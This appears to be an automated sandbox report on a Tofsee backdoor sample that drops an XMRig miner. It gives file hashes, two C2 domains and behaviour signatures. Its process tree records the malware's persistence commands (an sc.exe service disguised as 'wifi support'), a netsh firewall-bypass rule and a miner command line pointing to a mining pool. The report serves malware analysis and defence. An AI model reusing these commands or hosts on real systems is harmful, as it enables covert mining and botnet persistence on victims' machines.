Overview

overview

10

Static

static

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    09-09-2022 08:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    429223f2374f630c661714caef8e3247bbb6cfd6b0354bf4529233a66f46c228.exe

  • Size

    206KB

  • MD5

    c7ccc0106e042fb84bb9a30d14239d88

  • SHA1

    688d6637b1f49fe27983d7799d385b8b25b91e0a

  • SHA256

    429223f2374f630c661714caef8e3247bbb6cfd6b0354bf4529233a66f46c228

  • SHA512

    89cadd745958b76c045391dd13f09aaa8da5afb8dc9bc3796594122dc0d191daea39f391f564baa92d8014cb0a3da012aef484cf23f2663b954fab04c21a03bf

  • SSDEEP

    3072:II4C5+VZNNA7P65ymfeBY2SXry2YipLh/E/CfsnzvUSN/rgRA:w/Nm7DLBJSXry2dpLWTnzUSN/

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\429223f2374f630c661714caef8e3247bbb6cfd6b0354bf4529233a66f46c228.exe
    "C:\Users\Admin\AppData\Local\Temp\429223f2374f630c661714caef8e3247bbb6cfd6b0354bf4529233a66f46c228.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1460
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jxcfhicc\
      2⤵
        PID:3644
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qyqapaid.exe" C:\Windows\SysWOW64\jxcfhicc\
        2⤵
          PID:4020
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create jxcfhicc binPath= "C:\Windows\SysWOW64\jxcfhicc\qyqapaid.exe /d\"C:\Users\Admin\AppData\Local\Temp\429223f2374f630c661714caef8e3247bbb6cfd6b0354bf4529233a66f46c228.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3488
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description jxcfhicc "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:4220
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start jxcfhicc
          2⤵
          • Launches sc.exe
          PID:4308
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4692
      • C:\Windows\SysWOW64\jxcfhicc\qyqapaid.exe
        C:\Windows\SysWOW64\jxcfhicc\qyqapaid.exe /d"C:\Users\Admin\AppData\Local\Temp\429223f2374f630c661714caef8e3247bbb6cfd6b0354bf4529233a66f46c228.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4688
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:2160
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2616

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\qyqapaid.exe
        Filesize

        11.6MB

        MD5

        03c9bd4ffd13b89c2a32a49b381c310f

        SHA1

        5cd5ee88fd44d3784865a8f440b87292b35edf1b

        SHA256

        73b51b668c70cdc2b1c8dbc36562a8e3ebf1d086434484bc10ab8a7f66557dab

        SHA512

        9d4951bc9d38f50ac4afecefc7f4724c314af1f0a14e011bfbf95998a1bcbe182fe1260675b5879df80d5081cd7c8007e99d835195a8ab4cb449d001ce3742bd

        Download Submit

      • C:\Windows\SysWOW64\jxcfhicc\qyqapaid.exe
        Filesize

        11.6MB

        MD5

        03c9bd4ffd13b89c2a32a49b381c310f

        SHA1

        5cd5ee88fd44d3784865a8f440b87292b35edf1b

        SHA256

        73b51b668c70cdc2b1c8dbc36562a8e3ebf1d086434484bc10ab8a7f66557dab

        SHA512

        9d4951bc9d38f50ac4afecefc7f4724c314af1f0a14e011bfbf95998a1bcbe182fe1260675b5879df80d5081cd7c8007e99d835195a8ab4cb449d001ce3742bd

        Download Submit

      • memory/1460-161-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-152-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-123-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-124-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-121-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-126-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-127-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-128-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-129-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-130-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-131-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-132-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-133-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-134-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-135-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-136-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-137-0x0000000002DF7000-0x0000000002E08000-memory.dmp

        Filesize

        68KB

        Download

      • memory/1460-138-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-139-0x0000000002B80000-0x0000000002CCA000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/1460-140-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-141-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-142-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-143-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-144-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-145-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-146-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-147-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-148-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-149-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-150-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-151-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-162-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-153-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-154-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-155-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-156-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-157-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-158-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-159-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-160-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-125-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-122-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-164-0x0000000000400000-0x0000000002B7E000-memory.dmp

        Filesize

        39.5MB

        Download

      • memory/1460-163-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-165-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-166-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-167-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-168-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-169-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-230-0x0000000000400000-0x0000000002B7E000-memory.dmp

        Filesize

        39.5MB

        Download

      • memory/1460-120-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1460-218-0x0000000002DF7000-0x0000000002E08000-memory.dmp

        Filesize

        68KB

        Download

      • memory/2160-488-0x00000000030D0000-0x00000000030E5000-memory.dmp

        Filesize

        84KB

        Download

      • memory/2160-423-0x00000000030D0000-0x00000000030E5000-memory.dmp

        Filesize

        84KB

        Download

      • memory/3488-182-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3488-186-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3488-190-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3488-183-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3488-184-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3644-180-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3644-171-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3644-174-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3644-172-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3644-173-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/4020-179-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/4020-178-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/4020-185-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/4020-177-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/4020-176-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/4220-189-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/4220-191-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/4688-312-0x0000000002C80000-0x0000000002DCA000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/4688-315-0x0000000002C80000-0x0000000002DCA000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/4688-357-0x0000000000400000-0x0000000002B7E000-memory.dmp

        Filesize

        39.5MB

        Download